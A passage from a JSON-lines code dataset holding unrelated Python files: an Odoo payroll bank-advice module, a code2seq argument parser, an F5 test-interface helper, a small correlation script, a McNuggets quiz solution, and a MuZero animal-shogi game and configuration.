\"hr.salary.rule\"\n \n _columns = {\n 'register_id':fields.many2one('hr.contribution.register', 'Contribution Register', help=\"Eventual third party involved in the salary payment of the employees.\"),\n #'ss_code':fields.char('Social Security Code', size=64),\n 'hide_in_contract_report' : fields.boolean('Hide in contract Report'),\n 'protect_lock' : fields.boolean('Protect from lock')\n }\n \n _order = 'sequence'\n \nclass hr_employee_history(osv.osv):\n _name = 'hr.employee.history'\n _description = 'Employee History'\n \n _columns={\n 'employee_id': fields.many2one('hr.employee', 'Employee', on_delete='cascade', required=True),\n 'message': fields.char(\"Message\", size=128, required=True),\n 'table': fields.many2one('ir.model', 'Table', required=True),\n 'field': fields.char(\"Field\", size=64, required=True),\n 'from': fields.char(\"From\", size=64),\n 'to': fields.char(\"To\", size=64, required=True),\n 'date' : fields.datetime(\"Date\", required=True),\n 'user_id':fields.many2one('res.users', 'User', required=True),\n }\n \nhr_employee_history()\n\nclass payroll_advice(osv.osv):\n '''\n Bank Advice Note\n '''\n\n _name = 'hr.payroll.advice'\n _description = 'Bank Advice Note'\n \n def _get_banks (self, cr, uid, ids, name, args, context=None): #(self, cr, uid, ids, context=None):\n res = {}\n values = []\n \n for bank in self.pool.get('res.users').browse(cr, uid, uid,\n 
context=context).company_id.bank_ids:\n t1 = bank.id\n values.append(t1)\n res = values\n\n return res\n \n _columns = {\n 'register_id':fields.many2one('hr.payslip.run', 'Payslip Run', required=False),\n 'name':fields.char('Name', size=2048, required=True, readonly=False),\n 'note': fields.text('Description'),\n 'date': fields.date('Date'),\n 'compute_date': fields.date('Compute Date', required=True),\n 'state':fields.selection([\n ('draft','Draft Sheet'),\n ('confirm','Confirm Sheet'),\n ('cancel','Reject'),\n ],'State', select=True, readonly=True),\n 'number':fields.char('Number', size=64, required=False, readonly=True),\n 'line_ids':fields.one2many('hr.payroll.advice.line', 'advice_id', 'Employee Salary', required=False),\n 'chaque_nos':fields.char('Cheque Nos', size=256, required=False, readonly=False),\n 'company_id':fields.many2one('res.company', 'Company', required=False),\n 'bank_id': fields.many2one('res.partner.bank', 'Bank', help=\"Select the Bank Address from which the salary is going to be paid\",required=True ),\n }\n _defaults = {\n 'date': lambda *a: time.strftime('%Y-%m-%d'),\n 'state': lambda *a: 'draft',\n 'company_id': lambda self, cr, uid, context: \\\n self.pool.get('res.users').browse(cr, uid, uid,\n context=context).company_id.id,\n# 'company_banks': [1,2]\n }\n\n def confirm_sheet(self, cr, uid, ids, context=None):\n sequence_pool = self.pool.get('ir.sequence')\n self.write(cr, uid, ids, {'state':'confirm','number': sequence_pool.get(cr, uid, 'payment.advice'),}, context=context)\n return True\n\n def set_to_draft(self, cr, uid, ids, context=None):\n self.write(cr, uid, ids, {'state':'draft'}, context=context)\n return True\n\n def cancel_sheet(self, cr, uid, ids, context=None):\n self.write(cr, uid, ids, {'state':'cancel'}, context=context)\n return True\n\n\n\n def onchange_company_id(self, cr, uid, ids, company_id=False, context=None):\n res = {}\n if company_id:\n company = self.pool.get('res.company').browse(cr, uid, company_id, context=context)\n if company.partner_id.bank_ids:\n res.update({'bank': company.partner_id.bank_ids[0].bank.name})\n return {\n 'value':res\n }\n \n def compute_sheet(self, cr, uid, ids, context=None):\n emp_pool = self.pool.get('hr.employee')\n slip_pool = self.pool.get('hr.payslip')\n slip_line_pool = self.pool.get('hr.payslip.line')\n advice_line_pool = self.pool.get('hr.payroll.advice.line')\n if context is None:\n context = {}\n for line in self.browse(cr, uid, ids):\n #remove old lines\n advice_line_pool.unlink(cr, uid, [x.id for x in line.line_ids])\n #compute new lines\n compute_date_year, compute_date_month, compute_date_day = line.compute_date.split('-')\n start_date = date(int(compute_date_year), int(compute_date_month), 1)\n # split('-') yields strings, so cast before comparing to roll December into the next year\n if int(compute_date_month) < 12:\n end_date = date(int(compute_date_year), int(compute_date_month) + 1 , 1)\n else:\n end_date = date(int(compute_date_year) + 1, 1, 1)\n payslip_ids = slip_pool.search(cr, uid, [\n ('date_from','>=',str(start_date))\n ,('date_from','<',str(end_date))\n ], order = 'employee_id')\n payslips = slip_pool.browse(cr, uid, payslip_ids)\n for payslip in payslips:\n if not payslip.employee_id.bank_account_id.acc_number:\n raise osv.except_osv(_('Error !'), _('Please define bank account for the %s employee') % (payslip.employee_id.name))\n if payslip.employee_id.bank_account_id.bank.id == line.bank_id.bank.id:\n value_net = [x.amount for x in payslip.line_ids if\n x.slip_id.state == 'done'\n and x.salary_rule_id.category_id.code in ('NET',)\n ]\n if not value_net:\n raise 
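`compute_sheet` above needs a half-open window from the first day of the compute month to the first day of the next month, and the December rollover is exactly where the original string-versus-int comparison misfired (fixed to `int(compute_date_month) < 12` above). A compact, year-safe way to build the same window:

```python
from datetime import date

def month_window(year, month):
    start = date(year, month, 1)
    # month % 12 + 1 rolls 12 -> 1, and the boolean bumps the year with it
    end = date(year + (month == 12), month % 12 + 1, 1)
    return start, end

assert month_window(2014, 3) == (date(2014, 3, 1), date(2014, 4, 1))
assert month_window(2014, 12) == (date(2014, 12, 1), date(2015, 1, 1))
```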
osv.except_osv(_('Error !'), _('Amount invalid for the %s employee. Category \"NET\" missing in payslip.') % (payslip.employee_id.name))\n vals = {\n 'advice_id': line.id,\n 'name':payslip.employee_id.bank_account_id.acc_number,\n 'employee_id':payslip.employee_id.id,\n 'amount': value_net[0],\n #'bysal': payslip.net\n #'flag': ',\n }\n advice_line_pool.create(cr, uid, vals)\n return True\n\nclass payroll_advice_line(osv.osv):\n '''\n Bank Advice Lines\n '''\n\n _name = 'hr.payroll.advice.line'\n _description = 'Bank Advice Lines'\n _columns = {\n 'advice_id':fields.many2one('hr.payroll.advice', 'Bank Advice', required=False),\n 'name':fields.char('Bank Account A/C', size=64, required=True, readonly=False),\n 'employee_id':fields.many2one('hr.employee', 'Employee', required=True),\n 'amount': fields.float('Amount', digits=(16, 2)),\n #'bysal': fields.float('By Salary', digits=(16, 4)),\n #'flag':fields.char('D/C', size=8, required=True, readonly=False),\n }\n \n def onchange_employee_id(self, cr, uid, ids, date, employee_id):\n res = {}\n if employee_id:\n employee = self.pool.get('hr.employee').browse(cr, uid, employee_id)\n if not employee.bank_account_id.acc_number:\n raise osv.except_osv(_('Error !'), _('Please define bank account for the %s employee') % (employee.name))\n else:\n res.update({'name': employee.bank_account_id.acc_number})\n return {'value': res}\n","sub_path":"tkao_hr_ao/hr_payroll_ao.py","file_name":"hr_payroll_ao.py","file_ext":"py","file_size_in_byte":41742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"227101747","text":"from argparse import ArgumentParser\n\n\ndef read_args():\n parser = ArgumentParser()\n\n group = parser.add_mutually_exclusive_group(required=True)\n group.add_argument(\"-d\", \"--data\", dest=\"data_path\",\n help=\"path to preprocessed dataset\")\n group.add_argument(\"-l\", \"--load_path\", dest=\"load_path\",\n help=\"path to load model files\", metavar=\"FILE\")\n\n parser.add_argument(\"-m\", \"--model_path\", dest=\"model_path\",\n help=\"path to save and load checkpoints\", metavar=\"FILE\", required=False)\n parser.add_argument(\"-s\", \"--save_path\", dest=\"save_path\",\n help=\"path to save model files\", metavar=\"FILE\", required=False)\n\n parser.add_argument(\"-t\", \"--test\", dest=\"test_path\",\n help=\"path to test file\", metavar=\"FILE\", required=False)\n\n parser.add_argument('-p', '--predict', dest='predict', type=str, default='java',\n help='starts prediction mode, argument is \"cpp\" or \"java\" dependin on language model')\n parser.add_argument('--debug', action='store_true')\n parser.add_argument('--seed', type=int, default=239)\n return parser.parse_args()\n","sub_path":"code2seq/args.py","file_name":"args.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"3747881","text":"from ..base import TestCase, Options\nfrom .config import ConfigInterface\nfrom .selenium import SeleniumInterface\nfrom .ssh import SSHInterface\nfrom .icontrol import IcontrolInterface, EMInterface\nfrom .rest import RestInterface\n\n\nclass InterfaceHelper(object):\n \"\"\"Adds get_selenium() helper to a TestCase.\n \n - If key is a string, then it will use it as the key to lookup in the global\n handles store, which is managed by the test package.\n \n - If key is a SeleniumInterface instance then it will open it, add it to the\n local handles store and return the opened interface.\n \n - If 
key is None then it will try to open a new SeleniumInterface using the\n args and kwargs provided.\n \"\"\"\n def _setup(self, name, ifcs=None):\n config = ConfigInterface().open()\n config.setdefault('_attrs', Options())\n \n if ifcs:\n del ifcs[:]\n self.ifcs = ifcs\n self._apis = {}\n self._handles = {}\n self._data = Options()\n i = pos = 0\n my_id = name\n while pos != -1:\n pos = my_id.find('.', i)\n if pos > 0:\n parent = my_id[:pos]\n load = config._attrs.get(parent)\n if load and isinstance(load, dict):\n self._handles.update(load)\n \n i = pos + 1\n \n def _teardown(self):\n for interface in self._apis.keys():\n self.pop_interface(interface)\n\n def set_data(self, key, data):\n self._data[key] = data\n\n def get_data(self, key):\n return self._data.get(key)\n\n def unset_data(self, key):\n self._data.__delitem__(key)\n\n def push_interface(self, interface, managed=False):\n if not managed:\n interface.open()\n self._apis[interface] = managed\n if isinstance(self.ifcs, list):\n self.ifcs.append(interface)\n #return interface.api\n return interface\n\n def pop_interface(self, interface):\n managed = self._apis.pop(interface)\n if isinstance(self.ifcs, list):\n self.ifcs.remove(interface)\n if not managed:\n interface.close()\n\n def get_interface(self, interface_class, key=None, *args, **kwargs):\n managed = False\n if isinstance(key, basestring):\n interface = self._handles.get(key)\n managed = True\n else:\n if isinstance(key, interface_class):\n interface = key\n elif key is None:\n interface = interface_class(*args, **kwargs)\n else:\n raise ValueError(\"key argument must be either string, \"\n \"%s or None\" % interface_class)\n\n return self.push_interface(interface, managed)\n \n def get_config(self, *args, **kwargs):\n return self.get_interface(ConfigInterface, *args, **kwargs)\n\n def get_selenium(self, key='selenium', *args, **kwargs):\n return self.get_interface(SeleniumInterface, key, *args, **kwargs)\n\n def get_ssh(self, *args, **kwargs):\n return self.get_interface(SSHInterface, *args, **kwargs)\n\n def get_icontrol(self, *args, **kwargs):\n return self.get_interface(IcontrolInterface, *args, **kwargs)\n\n def get_em(self, *args, **kwargs):\n return self.get_interface(EMInterface, *args, **kwargs)\n\n def get_rest(self, *args, **kwargs):\n return self.get_interface(RestInterface, *args, **kwargs)\n\n\nclass InterfaceTestCase(InterfaceHelper, TestCase):\n \"\"\"Updates the current test attributes with the ones set in config._attrs.\n \n In tests.setup_module():\n config._attrs['tests'] = dict(handle1=1)\n \n In tests.em.setup_module():\n config._attrs['tests.em'] = dict(handle1=2)\n \n In tests.em.ui.setup_module():\n config._attrs['tests.em.ui'] = dict(handle2=3)\n \n \n Then the test would be able to access these attrs like this:\n \n tests.em.ui.test_file.TestClass.testMe:\n def testMe(self):\n print self.handle1 # would print '2'\n print self.handle2 # would print '3'\n \"\"\"\n @classmethod\n def setup_class(cls):\n ih = InterfaceHelper()\n name = \"%s.%s\" % (cls.__module__, cls.__name__)\n ih._setup(name)\n cls.ih = ih\n\n @classmethod\n def teardown_class(cls):\n cls.ih._teardown()\n\n def setUp(self, *args, **kwargs):\n self._setup(self.id())\n \n super(TestCase, self).setUp(*args, **kwargs)\n\n def tearDown(self, *args, **kwargs):\n self._teardown()\n \n super(TestCase, self).tearDown(*args, 
**kwargs)\n","sub_path":"f5test/interfaces/testcase.py","file_name":"testcase.py","file_ext":"py","file_size_in_byte":4629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"353979269","text":"'''\r\nsimple python script that gets best correlation from files\r\n'''\r\n\r\nimport sys\r\nimport pandas\r\nimport os\r\n\r\nfilelist = sys.argv[2:]\r\n#print(filelist)\r\nmaxval = 0\r\nmatrix = \"\"\r\nalg = \"\"\r\nfor file in filelist:\r\n [data,disease,mrna,to,prot,mat,cor] = os.path.basename(file).split('-')\r\n if mrna == prot:\r\n tab = pandas.read_csv(file, sep='\\t', header=None)\r\n meanVal = tab[1].mean()\r\n if meanVal > maxval:\r\n maxval = meanVal\r\n alg = mrna\r\n matrix = mat\r\n\r\nif sys.argv[1]=='alg':\r\n print(alg)\r\nelse:\r\n print(matrix)\r\n","sub_path":"metrics/correlations/getBestCor.py","file_name":"getBestCor.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"470728385","text":"def McNuggets(n):\n \"\"\"\n n is an int\n \n Returns True if some integer combination of 6, 9 and 20 equals n\n Otherwise returns False.\n \"\"\"\n # Your Code Here\n if n < 6:\n return False\n if n == 6 or n == 9 or n == 20 or n%20 == 0 or n%9 == 0 or n%6 == 0 or n%15 == 0 or n%26 == 0 or n%29 == 0 or n%35 == 0:\n return True\n a, b, c = 0, 0, 0\n while 6*a+9*b+20*c <= n:\n if 6*a+9*b+20*c == n:\n return True\n while 6*a+9*b+20*c <= n:\n if 6*a+9*b+20*c == n:\n return True\n while 6*a+9*b+20*c <= n:\n if 6*a+9*b+20*c == n:\n return True\n c+=1\n b +=1\n c = 0\n a += 1\n b = 0 \n if 6*a+9*b+20*c != n:\n return False\n","sub_path":"Quiz/qp7.py","file_name":"qp7.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"161893427","text":"import datetime\nimport os\nimport copy\nfrom dataclasses import dataclass, astuple\nfrom typing import Optional\n\nimport numpy\nimport torch\nfrom colorama import Back\n\n\ntry:\n from abstract_game import AbstractGame\nexcept ImportError:\n from .abstract_game import AbstractGame\n\ntry:\n from models import MuZeroResidualNetwork\nexcept ImportError:\n from ..models import MuZeroResidualNetwork\n\n\nBOARD_SIZE_X = 3\nBOARD_SIZE_Y = 4\nUNIT_KIND_NUM = 5 # Lion, Elephant, Giraph, Piyo, Chicken(Piyo Promoted)\nCAPTURABLE_KIND_NUM = 3 # Elephant, Giraph, Piyo\n\nACTION_SPACE_SIZE = (\n (BOARD_SIZE_X * BOARD_SIZE_Y + CAPTURABLE_KIND_NUM) * # FROM\n (BOARD_SIZE_X * BOARD_SIZE_Y) * # TO\n 2 # Promote\n)\n\nP1_COLOR = Back.BLUE\nP2_COLOR = Back.RED\nRESET = Back.RESET\n\n\nclass MuZeroConfig:\n def __init__(self):\n # More information is available here: https://github.com/werner-duvaud/muzero-general/wiki/Hyperparameter-Optimization\n\n self.seed = 0 # Seed for numpy, torch and the game\n # Fix the maximum number of GPUs to use. It's usually faster to use a single GPU (set it to 1) if it has enough memory. None will use every GPUs available\n self.max_num_gpus = None\n\n # Game\n # Dimensions of the game observation, must be 3D (channel, height, width). For a 1D array, please reshape it to (1, 1, length of array)\n self.observation_shape = (\n (UNIT_KIND_NUM+CAPTURABLE_KIND_NUM)*2 + 1, BOARD_SIZE_Y, BOARD_SIZE_X)\n # Fixed list of all possible actions. You should only edit the length\n self.action_space = list(range(ACTION_SPACE_SIZE))\n # List of players. 
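The `McNuggets` solution in qp7.py above re-walks the whole (a, b, c) grid with manual counter resets; since no useful combination needs more than n//20 twenty-packs or n//9 nine-packs, a bounded double loop with a divisibility check covers the same search. A sketch of that tighter version (it should agree with the original for positive n; 0 is kept False to mirror the original's n < 6 guard):

```python
def mcnuggets(n):
    """True if n == 6a + 9b + 20c for some non-negative integers a, b, c."""
    if n <= 0:
        return False
    for c in range(n // 20 + 1):
        for b in range((n - 20 * c) // 9 + 1):
            if (n - 20 * c - 9 * b) % 6 == 0:
                return True
    return False

# 43 is the largest exact order you cannot place with packs of 6, 9 and 20
assert not mcnuggets(43)
assert all(mcnuggets(k) for k in range(44, 200))
```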
You should only edit the length\n self.players = list(range(2))\n # Number of previous observations and previous actions to add to the current observation\n self.stacked_observations = 0\n\n # Evaluate\n # Turn Muzero begins to play (0: MuZero plays first, 1: MuZero plays second)\n self.muzero_player = 0\n self.opponent = \"expert\" # Hard coded agent that MuZero faces to assess his progress in multiplayer games. It doesn't influence training. None, \"random\" or \"expert\" if implemented in the Game class\n\n # Self-Play\n # Number of simultaneous threads/workers self-playing to feed the replay buffer\n self.num_workers = 5\n self.selfplay_on_gpu = False\n self.max_moves = 100 # Maximum number of moves if game is not finished before\n self.num_simulations = 80 # Number of future moves self-simulated\n self.discount = 1 # Chronological discount of the reward\n # Number of moves before dropping the temperature given by visit_softmax_temperature_fn to 0 (ie selecting the best action). If None, visit_softmax_temperature_fn is used every time\n self.temperature_threshold = None\n\n # Root prior exploration noise\n self.root_dirichlet_alpha = 0.2\n self.root_exploration_fraction = 0.25\n\n # UCB formula\n self.pb_c_base = 19652\n self.pb_c_init = 1.25\n\n # Network\n self.network = \"animal_shogi\" # \"resnet\" / \"fullyconnected\"\n # Value and reward are scaled (with almost sqrt) and encoded on a vector with a range of -support_size to support_size. Choose it so that support_size <= sqrt(max(abs(discounted reward)))\n self.support_size = 1\n\n # Residual Network and animal_shogi Network\n # Downsample observations before representation network, False / \"CNN\" (lighter) / \"resnet\" (See paper appendix Network Architecture)\n self.downsample = False\n self.blocks = 3 # Number of blocks in the ResNet\n self.channels = 64 # Number of channels in the ResNet\n self.reduced_channels_reward = 16 # Number of channels in reward head\n self.reduced_channels_value = 16 # Number of channels in value head\n self.reduced_channels_policy = 32 # Number of channels in policy head\n # Define the hidden layers in the reward head of the dynamic network\n self.resnet_fc_reward_layers = [8]\n # Define the hidden layers in the value head of the prediction network\n self.resnet_fc_value_layers = [8]\n # Define the hidden layers in the policy head of the prediction network\n self.resnet_fc_policy_layers = [64]\n\n # Fully Connected Network\n self.encoding_size = 32\n # Define the hidden layers in the representation network\n self.fc_representation_layers = []\n # Define the hidden layers in the dynamics network\n self.fc_dynamics_layers = [16]\n # Define the hidden layers in the reward network\n self.fc_reward_layers = [16]\n self.fc_value_layers = [] # Define the hidden layers in the value network\n self.fc_policy_layers = [] # Define the hidden layers in the policy network\n\n # Training\n self.results_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"../results\", os.path.basename(__file__)[\n :-3], datetime.datetime.now().strftime(\"%Y-%m-%d--%H-%M-%S\")) # Path to store the model weights and TensorBoard logs\n self.save_model = True # Save the checkpoint in results_path as model.checkpoint\n # Total number of training steps (ie weights update according to a batch)\n self.training_steps = 2000000\n self.batch_size = 256 # Number of parts of games to train on at each training step\n # Number of training steps before using the model for self-playing\n self.checkpoint_interval = 10\n # Scale the 
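A quick check of the sizes wired into the config above: an action is a (source, destination, promotion) triple where the source is one of the 12 board squares or one of the 3 droppable piece kinds in hand, and the observation stacks piece planes, stock planes and a to-play plane:

```python
BOARD = 3 * 4                       # BOARD_SIZE_X * BOARD_SIZE_Y
sources = BOARD + 3                 # 12 squares + 3 capturable kinds (E, G, P)
assert sources * BOARD * 2 == 360   # ACTION_SPACE_SIZE

channels = (5 + 3) * 2 + 1          # (UNIT_KIND_NUM + CAPTURABLE_KIND_NUM)*2 + 1
assert channels == 17               # first entry of observation_shape
```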
value loss to avoid overfitting of the value function, paper recommends 0.25 (See paper appendix Reanalyze)\n self.value_loss_weight = 0.25\n self.train_on_gpu = torch.cuda.is_available() # Train on GPU if available\n\n self.optimizer = \"Adam\" # \"Adam\" or \"SGD\". Paper uses SGD\n self.weight_decay = 1e-5 # L2 weights regularization\n self.momentum = 0.9 # Used only if optimizer is SGD\n\n # Exponential learning rate schedule\n self.lr_init = 0.003 # Initial learning rate\n self.lr_decay_rate = 1 # Set it to 1 to use a constant learning rate\n self.lr_decay_steps = 10000\n\n # Replay Buffer\n # Number of self-play games to keep in the replay buffer\n self.replay_buffer_size = 10000\n self.num_unroll_steps = 5 # Number of game moves to keep for every batch element\n # Number of steps in the future to take into account for calculating the target value\n self.td_steps = self.max_moves\n # Prioritized Replay (See paper appendix Training), select in priority the elements in the replay buffer which are unexpected for the network\n self.PER = False\n # How much prioritization is used, 0 corresponding to the uniform case, paper suggests 1\n self.PER_alpha = 0.5\n\n # Reanalyze (See paper appendix Reanalyse)\n # Use the last model to provide a fresher, stable n-step value (See paper appendix Reanalyze)\n self.use_last_model_value = False\n self.reanalyse_on_gpu = False\n\n # Adjust the self play / training ratio to avoid over/underfitting\n self.self_play_delay = 0 # Number of seconds to wait after each played game\n self.training_delay = 0 # Number of seconds to wait after each training step\n self.ratio = None # Desired training steps per self played step ratio. Equivalent to a synchronous version, training can take much longer. Set it to None to disable it\n\n @property\n def random_move_till_n_action_in_self_play(self):\n return numpy.random.choice([0, 0, 2, 2, 2, 2, 4])\n\n def visit_softmax_temperature_fn(self, trained_steps):\n \"\"\"\n Parameter to alter the visit count distribution to ensure that the action selection becomes greedier as training progresses.\n The smaller it is, the more likely the best action (ie with the highest visit count) is chosen.\n\n Returns:\n Positive float.\n \"\"\"\n if trained_steps < self.training_steps * 0.5:\n return 1\n else:\n return 0.75\n\n def num_simulations_fn(self, training_step):\n rate = training_step / (self.training_steps * 0.2)\n n = numpy.clip(self.num_simulations * rate, 20, self.num_simulations)\n return int(n)\n\n\nclass Game(AbstractGame):\n \"\"\"\n Game wrapper.\n \"\"\"\n\n def __init__(self, seed=None):\n self.env = AnimalShogi()\n\n def step(self, action):\n \"\"\"\n Apply action to the game.\n\n Args:\n action : action of the action_space to take.\n\n Returns:\n The new observation, the reward and a boolean if the game has ended.\n \"\"\"\n observation, reward, done = self.env.step(action)\n return observation, reward, done\n\n def to_play(self):\n \"\"\"\n Return the current player.\n\n Returns:\n The current player, it should be an element of the players list in the config. \n \"\"\"\n return self.env.to_play()\n\n def legal_actions(self):\n \"\"\"\n Should return the legal actions at each turn, if it is not available, it can return\n the whole action space. 
At each turn, the game have to be able to handle one of returned actions.\n\n For complex game where calculating legal moves is too long, the idea is to define the legal actions\n equal to the action space but to return a negative reward if the action is illegal.\n\n Returns:\n An array of integers, subset of the action space.\n \"\"\"\n return self.env.legal_actions()\n\n def reset(self):\n \"\"\"\n Reset the game for a new game.\n\n Returns:\n Initial observation of the game.\n \"\"\"\n return self.env.reset()\n\n def render(self):\n \"\"\"\n Display the game observation.\n \"\"\"\n self.env.render()\n input(\"Press enter to take a step \")\n\n def human_to_action(self):\n \"\"\"\n For multiplayer games, ask the user for a legal action\n and return the corresponding action number.\n\n Returns:\n An integer from the action space.\n \"\"\"\n return self.env.human_to_action()\n\n def action_to_string(self, action_number):\n \"\"\"\n Convert an action number to a string representing the action.\n\n Args:\n action_number: an integer from the action space.\n\n Returns:\n String representing the action.\n \"\"\"\n return self.env.action_to_string(action_number)\n\n def expert_agent(self):\n \"\"\"\n Hard coded agent that MuZero faces to assess his progress in multiplayer games.\n It doesn't influence training\n\n Returns:\n Action as an integer to take in the current game state\n \"\"\"\n return self.env.expert_action()\n\n\n@dataclass\nclass Move:\n from_board: Optional[int] # (y*3 + x) or None\n from_stock: Optional[int] # (E=0, G=1, P=2) or None\n to_board: int # (y*3 + x)\n promotion: int # 0 or 1(promote)\n\n @classmethod\n def decode_from_action_index(cls, action: int):\n \"\"\"\n\n :param action:\n ActionSpace: combination of below\n From H*W + 3(E G P stock) (15)\n To H*W (12)\n Promote 2 (2)\n \"\"\"\n board_size = BOARD_SIZE_Y * BOARD_SIZE_X\n assert 0 <= action < (board_size+3) * board_size * 2\n promote = action % 2\n action //= 2\n to_board = action % board_size\n action //= board_size\n if action < board_size:\n from_board = action\n from_stock = None\n else:\n from_board = None\n from_stock = action - board_size # (E=0, G=1, P=2)\n return cls(from_board, from_stock, to_board, promote)\n\n def encode_to_action_index(self) -> int:\n board_size = BOARD_SIZE_Y * BOARD_SIZE_X\n if self.from_stock is None:\n action = self.from_board\n else:\n action = board_size + self.from_stock\n action *= board_size * 2\n action += self.to_board * 2\n action += self.promotion\n assert 0 <= action < (board_size+3) * board_size * 2\n return action\n\n def from_pos(self):\n assert self.from_board is not None\n return self.from_board // BOARD_SIZE_X, self.from_board % BOARD_SIZE_X\n\n def to_pos(self):\n assert self.to_board is not None\n return self.to_board // BOARD_SIZE_X, self.to_board % BOARD_SIZE_X\n\n def clone(self):\n return Move(*astuple(self))\n\n\nclass AnimalShogi:\n board = None\n stocks = None\n player = 0\n _legal_actions = None\n\n def __init__(self):\n self.init_game()\n\n def clone(self):\n obj = AnimalShogi()\n obj.board = numpy.copy(self.board)\n obj.stocks = numpy.copy(self.stocks)\n obj.player = self.player\n obj._legal_actions = copy.copy(self._legal_actions)\n return obj\n\n def init_game(self):\n # Board(H=4, W=3)\n # player-0: L=1, E=2, G=3, P=4, C=5\n # player-1: L=6, E=7, G=8, P=9, C=10\n # stocks for p0 = (E, G, P)\n # stocks for p1 = (E, G, P)\n self.board = numpy.array([\n [G2, L2, E2],\n [0, P2, 0],\n [0, P1, 0],\n [E1, L1, G1],\n ], dtype=\"int32\")\n self.stocks = 
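`Move.encode_to_action_index` and `Move.decode_from_action_index` above are exact inverses: the index packs `(source * 12 + to_board) * 2 + promotion`, with drops occupying source slots 12 to 14. Worth verifying once by hand:

```python
m = Move(from_board=5, from_stock=None, to_board=2, promotion=0)
idx = m.encode_to_action_index()   # (5 * 12 + 2) * 2 + 0 == 124
assert idx == 124
assert Move.decode_from_action_index(idx) == m  # dataclass equality

drop = Move(from_board=None, from_stock=1, to_board=11, promotion=0)
assert Move.decode_from_action_index(drop.encode_to_action_index()) == drop
```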
numpy.zeros((2, CAPTURABLE_KIND_NUM), dtype=\"int32\")\n self.player = 0\n self._legal_actions = None\n\n def reset(self):\n self.init_game()\n return self.get_observation()\n\n def to_play(self):\n return self.player\n\n def step(self, action):\n move = Move.decode_from_action_index(action)\n if not self.is_legal(move):\n return self.get_observation(), -1, True\n win, lose, done = self.do_move(move)\n self.player = 1 - self.player\n reward = 0\n if win:\n reward = 1\n elif lose:\n reward = -1\n return self.get_observation(), reward, done\n\n def do_move(self, move: Move):\n self._legal_actions = None\n player = self.to_play()\n win = False\n lose = False\n done = False\n if move.from_stock is not None: # drop\n self.stocks[player][move.from_stock] -= 1\n unit_kind = move.from_stock + 2 + player * 5 # (2,3,4 or 7,8,9)\n self.board[move.to_pos()] = unit_kind\n else:\n unit_kind = self.board[move.from_pos()]\n self.board[move.from_pos()] = 0\n if self.board[move.to_pos()] > 0: # capture\n captured_unit_kind = self.board[move.to_pos()] % 5\n if captured_unit_kind == 1: # Lion\n done = win = True\n else:\n # board:E, G, P, C -> stock:E, G, P, P\n stock_kind = [2, None, 0, 1, 2][captured_unit_kind]\n self.stocks[player][stock_kind] += 1\n self.board[move.to_pos()] = unit_kind + move.promotion\n # Player1 Lion Try!\n if player == 0 and numpy.any(self.board[BOARD_SIZE_Y-1] == L2):\n lose = done = True\n # Player0 Lion Try!\n elif player == 1 and numpy.any(self.board[0] == L1):\n lose = done = True\n return win, lose, done\n\n @staticmethod\n def is_legal_move_direction(unit_kind, from_pos, to_pos):\n diff = (to_pos[0]-from_pos[0], to_pos[1]-from_pos[1])\n return diff in ALLOWED_MOVES[unit_kind]\n\n def is_legal(self, move: Move):\n player = self.to_play()\n if move.from_stock is not None:\n remain_num = self.stocks[self.to_play()][move.from_stock]\n if remain_num < 1:\n return False\n if move.promotion == 1:\n return False\n else:\n unit_kind = self.board[move.from_pos()]\n if unit_kind == 0: # no unit there\n return False\n elif unit_kind < 6 and self.to_play() == 1: # opponent unit\n return False\n elif unit_kind > 5 and self.to_play() == 0: # opponent unit\n return False\n if move.promotion == 1:\n if player == 0 and (unit_kind != P1 or move.to_pos()[0] != 0):\n return False\n elif player == 1 and (unit_kind != P2 or move.to_pos()[0] != BOARD_SIZE_Y-1):\n return False\n if not self.is_legal_move_direction(unit_kind, move.from_pos(), move.to_pos()):\n return False\n\n captured = self.board[move.to_pos()]\n if captured:\n if move.from_stock is not None:\n return False # drop on the unit directly\n if captured < 6 and self.to_play() == 0: # capture my team0\n return False\n if captured > 5 and self.to_play() == 1: # capture my team1\n return False\n return True\n\n def get_observation(self):\n channels = []\n # board\n for kind in range(1, 11):\n ch = numpy.where(self.board == kind, 1, 0)\n channels.append(ch)\n # stock\n for player in [0, 1]:\n for kind in range(CAPTURABLE_KIND_NUM):\n ch = numpy.full_like(\n channels[0], self.stocks[player][kind] / 2.)\n channels.append(ch)\n # to_play\n ch = numpy.full_like(channels[0], 1 - self.to_play() * 2)\n channels.append(ch)\n return numpy.array(channels, dtype=\"int32\")\n\n def legal_actions(self):\n if self._legal_actions is None:\n ret = []\n for action in range(ACTION_SPACE_SIZE):\n if self.is_legal(Move.decode_from_action_index(action)):\n ret.append(action)\n self._legal_actions = ret\n return copy.copy(self._legal_actions)\n\n def 
human_to_action(self):\n stock_kinds = {\"E\": 0, \"G\": 1, \"C\": 2}\n if self.to_play() == 0:\n print(P1_COLOR + f\"Player1\" + RESET)\n else:\n print(P2_COLOR + f\"Player2\" + RESET)\n\n def convert_position_string_to_pos_index(pos_str):\n try:\n pos_str = pos_str.lower()\n col = int(pos_str[0]) - 1\n row = \"abcd\".index(pos_str[1])\n return row * BOARD_SIZE_X + col\n except:\n return None\n\n # input from\n from_stock = None\n from_board = None\n to_board = None\n player = self.to_play()\n while True:\n while True:\n try:\n from_str = input(\n f\"From(ex: '1a', '2d', or 'E' 'G' 'C' from stock): \").strip()\n if from_str == \"random\":\n return numpy.random.choice(self.legal_actions())\n if from_str.upper() in stock_kinds:\n from_stock = stock_kinds[from_str.upper()]\n if self.stocks[player][from_stock] > 0:\n break\n else:\n print(f\"You do not have {from_str}\")\n elif len(from_str) == 2:\n from_board = convert_position_string_to_pos_index(\n from_str)\n if from_board is None:\n print(f\"illegal position {from_str}\")\n else:\n break\n except:\n pass\n print(\"Wrong input, try again\")\n\n while True:\n try:\n to_str = input(f\"To(ex: '1a', '2d'): \").strip()\n if to_str == \"random\":\n return numpy.random.choice(self.legal_actions())\n if len(to_str) == 2:\n to_board = convert_position_string_to_pos_index(to_str)\n if to_str is None:\n print(f\"illegal position {from_str}\")\n else:\n break\n 